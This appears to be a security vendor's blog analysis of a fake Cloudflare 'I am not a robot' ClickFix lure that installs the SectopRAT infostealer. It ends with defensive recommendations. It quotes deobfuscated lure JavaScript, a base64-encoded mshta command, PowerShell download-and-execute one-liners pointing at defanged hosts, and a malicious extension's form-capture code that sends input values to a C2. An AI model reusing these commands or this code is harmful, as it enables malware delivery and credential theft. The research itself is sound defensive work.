I Am Not A Robot

Since my last blog post on the subject, ClickFix-style social engineering techniques have been adopted by numerous threat groups who have continued to innovate their lures to make them increasingly more convincing. This blog post will look at a recent variant of this that appears to website visitors as a Cloudflare turnstile challenge, with an interesting twist.

The Malware

SectopRAT (aka ArechClient, 1xxbot) is a Remote Access Trojan built on the .NET framework that has been active since early 2019. This evasive malware employs an extensive toolkit for data exfiltration, including browser credential theft, cryptocurrency wallet harvesting, and system profiling capabilities. What distinguishes SectopRAT is its ability to establish concealed secondary desktops, allowing threat actors to remotely manipulate browser sessions without the victim's knowledge.

The malware implements robust anti-analysis features, including anti-VM and anti-emulator functionalities, while securing command and control communications with AES-256 encryption.

Just as in the scenario that will be described, SectopRAT is typically distributed through malvertising campaigns (including Google and Bing ads) and drive-by downloads of illegitimate software.

The Lure

Users are first drawn to the site through either Google search results or their 15k subscriber YouTube channel:

Shortly after loading, the ClickFix script is requested from an off-site URL:

<script type="text/javascript" src="hXXps://forfsakencoilddxga[.]com/cloud?ts=1742497282" id="ic-tracker-js" defer="defer" data-wp-strategy="defer"></script>

This 301’s to an R2 bucket at hXXps://caprofklfkzttripwith[.]com/main2.js, which serves up heavily obfuscated javascript. Obfuscator.io Deobfuscator took care of initial deobfuscation, and Claude tidied up the rest. Stepping through the script execution:

A DOM overlay is constructed which accurately mimics Cloudflare’s styling:

document.querySelector("head").appendChild(styleElement);

A pseudo-random 16-character “Ray ID” is generated:

for (let i = 0; i < 16; i++) {
  fakeRayId += "0123456789abcdef"[Math.floor(Math.random() * "0123456789abcdef".length)];
}

Timed animations are used to simulate the verification process spinner:

setTimeout(function() {
  document.getElementById("loading").style.display = "none";
  setTimeout(function() {
    document.getElementById("box").style.display = "flex";
    // other UI functions
  }, 300);
}, 2000);

Local storage is used to track interaction count:

if (!localStorage._0xc4a713) {
  localStorage._0xc4a713 = 0;
}
if (localStorage._0xc4a713 < 2) {
  // display message
}

After 2 attempts, the lure message is presented, suggesting unusual traffic has been detected:

A base64 encoded command is decoded, to be copied to the clipboard in place of the expected “verification code”:

let decodeCommand = function(encodedString) {
  encodedString = atob(encodedString);
  let bytes = new Uint8Array(encodedString.length);
  for (let i = 0; i < encodedString.length; i++) {
    bytes[i] = encodedString.charCodeAt(i);
  }
  return new TextDecoder("utf-8").decode(bytes);
};
let maliciousCommand = decodeCommand("bXNodGEgaHR0cHM6Ly9zZXJ2aWNlaW5kdXN0cnZlcmlmLmNvbSAjIEkgYW0gbm90IGEgcm9ib3Q6IENsb3VkZmxhcmUgVmVyaWZpY2F0aW9uIElEOiAxMVpBLVBPWg==");

The script also implements crude anti-debugging techniques that trigger an infinite breakpoint loop when developer tools are enabled:

function antiDebugFunction(param) {
  function debugDetector(counter) {
    if (typeof counter === "string") {
      return function(x) {}.constructor("while (true) {}").apply("counter");
    } else {
      if (('' + counter / counter).length !== 1 || counter % 20 === 0) {
        (function() { return true; }).constructor("debugger").call("action");
      }
    }
  }
  // run code
}

Execution

If followed, the instructions lead the user to paste text into a run box, which even on a large screen will obscure the functional command with a code comment:

When preceding this comment is an MSHTA command which invokes a script from hXXps://serviceindustrverif[.]com:

This runs PowerShell to make an HTTP request, download an MSI package to C:\Users\Public, and then execute it:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden iwr -Uri hXXps://ownlifeforyouwithme[.]com/plo -O $env:PUBLIC\\abc.msi;start $env:PUBLIC\\abc.msi

This URL 301’s to hXXps://kdfmmikfkafjikmfikfjhm[.]com/05.zrt, another public R2 bucket.

A standard installation notice very briefly appears:

Similar to behaviour seen in Qakbot samples of early 2024, the MSI uses SrTasks to create a system restore point as a means of persistence across factory resets:

hello.exe (94MB, with an invalid signature for Mcafee) and icuin40.dll are dropped in C:\Users\admin\AppData\Local\Beam\:

hello.exe goes through several rounds of unpacking before creating LightingService.exe under the user’s Roaming profile:

Persistence across sessions is set up by means of a startup entry:

Like hello.exe, LightingService.exe is also oversized and has an invalid signature:

This serves as the loader for the SectopRAT payload.

Impact

SectopRAT is loaded by LightingService.exe into MSBuild using reflection. Being a .NET application, the modules for the process can be dumped using a tool like MegaDumper:

Despite attempts to further clean up the code of the unpacked dfgfghfghfghfghfgh.exe, the control flow remains quite mangled. However, with adequate determination, both debugging it and deriving the capabilities of the RAT through static code review remain feasible. The code clearly reveals the main targeted data categories, including:

• System information.
• Cookies, saved passwords, history, autofills.
• Crypto wallets.
• VPN configs.

The binary also has an embedded resource that contains its encoded configuration. Stepping through a debugging session, the following function is found to perform the decoding prior to the strings being used by other functions (e.g., HTTP headers, C2 endpoints, target application paths):

This function performs deobfuscation of resource chunks using rolling parameters throughout the application lifecycle to:

• Apply integer transformations to input parameters: A_0 += 593 and A_1 -= 331
• Perform bitwise XOR between the modified values: num = A_0 ^ A_1
• Apply an integer division with truncation: num = num * 17 / 27
• Use the calculated value to position a stream pointer at offset 7 + num within the embedded resource.
• Read two 4-byte blocks to extract metadata, which is then decoded.
• The hardcoded XOR values (2100157544 and 485648943) and offset constants (100 and 5) serve as a two-layer obfuscation mechanism for the string metadata
• Reposition the stream to decoded position: Seek((long)num2, SeekOrigin.Begin)
• Allocate a buffer of exact decoded length: array = new byte[num3]
• Apply final single-byte XOR decryption using the third parameter (A_2) as the key.
• Join the array bytes as a single UTF8 encoded string.

Taking the C# implementation of this function, I developed a script to brute force the encoded configuration values directly from the resource file by:

• Scanning the entire resource file byte-by-byte, starting at the header offset.
• At each potential metadata location, attempt to decipher the positional metadata by:
  • Reading 4 bytes and interpreting them as a 32-bit integer.
  • Applying the exact XOR operation and offset used in the C# code.
  • Reading the next 4 bytes for the length, applying its specific transformation.
• For each valid metadata pair found:
  • Read the bytes at the calculated position
  • Try all 256 possible XOR keys (0-255) to decrypt the string.
  • Validate each potential decryption through multiple filters.
• To reduce the likelihood of false-positive results, multiple filter techniques are applied:
  • Check character validity to filter non-ASCII data.
  • Calculate Shannon entropy to distinguish meaningful text from random data.
  • Use regex to identify common string patterns (URLs, IP addresses, paths).
  • Identify legitimate English language content using NLTK.

An alternative approach was proposed by Jason Reaves, which instead uses YARA to initially identify known XOR-encoded patterns and their encryption keys, then narrows the search to a small window around these matches before selectively applying regex pattern matching with either the discovered key or brute-forcing keys only within this confined area.

As well as having a hardcoded C2, the resource also embeds a Pastebin URL that lists one or more C2 servers as backups:

Central to operation is the ScanResult object that is populated with the results of the collector functions, in preparation for exfil to the C2 server:

With the possible target paths and browser extension ID’s being:

SectopRAT may also deploy a browser plugin for Chrome, however this does not appear to be consistent in every run:

The plugin has a Google Docs icon and is given the name “Google Docs”. While the bundled jquery script is genuine, the others are not. background.js implements a CORS bypass to allow content.js to bypass same-origin policy, regardless of web server configuration:

• Registers a message listener for content script communications.
• Executes HTTP GET requests to arbitrary URLs on behalf of the content script.
• Returns responses asynchronously through Promise resolution.

Data interception by content.js is achieved by:

• Executing immediately upon page load via a self-invoking function.
• Reporting initial URL to the command server: getNoRet(server+'churl?pcid='+iddd+"&url="+loc)
• Establishing event listeners on all input elements across five form element types.
• Rebinding event listeners when detecting navigation: currLoc != location.href

The core data capture function transmits every form interaction to the C2 with contextual metadata, including field name, domain, and client identifier:

function spyjs_getInput(inputInfo, clid){
  var name = inputInfo.name;
  var value = inputInfo.value;
  if(name === ""){ name="undefined_input"; }
  if(value != ""){
    getNoRet(server+'fsave?name='+name+"&value="+value+"&sites="+base+"&clid="+clid);
  }
}

Variants

Less than a day later, the site started serving the same SectopRAT payload via an AutoIt chain. While the PowerShell download URL remained the same, it served up a different executable with an invalid signature (for Dunes MultiMedia). Additionally, the loader (jsc.exe) contains an invalid Microsoft signature:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden iwr -Uri hXXps://ownlifeforyouwithme[.]com/plo -O $env:PUBLIC\\abc.exe;start $env:PUBLIC\\abc.exe

Artifacts

This sample was also provided to montysecurity who very promptly added detection for SectopRAT C2 servers to their excellent C2 Tracker project.

Fellow researcher Saksham Anand has also performed some neat analysis of the infrastructure associated with this campaign.

Response

• Retire legacy antivirus solutions in favour of modern XDR options such as Defender for Endpoint, CrowdStrike or SentinelOne. Our testing showed only behavioral detections, which antivirus would provide little or no coverage of. 
• Ensure your XDR platform is configured according to vendor recommended best practices. This will include:
  • Enabling anti-tamper functionality.
  • Avoiding exclusions wherever possible and defining exclusions as specifically possible where a conflict between software and the security platform is identified. Never define broad exclusions, including those that apply to entire drives or profiles, file-types or system applications that could be abused as a LOLBIN.
• Pay specific attention to Defender for Endpoint alerts pertaining to an “emerging threat” or specifically named threat actor:

• Do not underestimate the potential implications of low and medium severity detections. It is vital to consider their context:

• Avoid in-browser secret storage, including for passwords, autofills and credit card data. Opt for a secure password manager, like 1Password or ProtonPass.
• Ensure that browsers and extensions are set to automatically update.
• Use an adblocker within your browser. This includes Adblock Plus for Edge, and Brave’s built-in capability.
• Store substantial cryptocurrency holdings in a hardware wallet (e.g., Ledger, Trezor).

Understand Your Coverage

If you'd like to better understand your coverage of remote access trojans and infostealer malware, please reach out to us to book a call.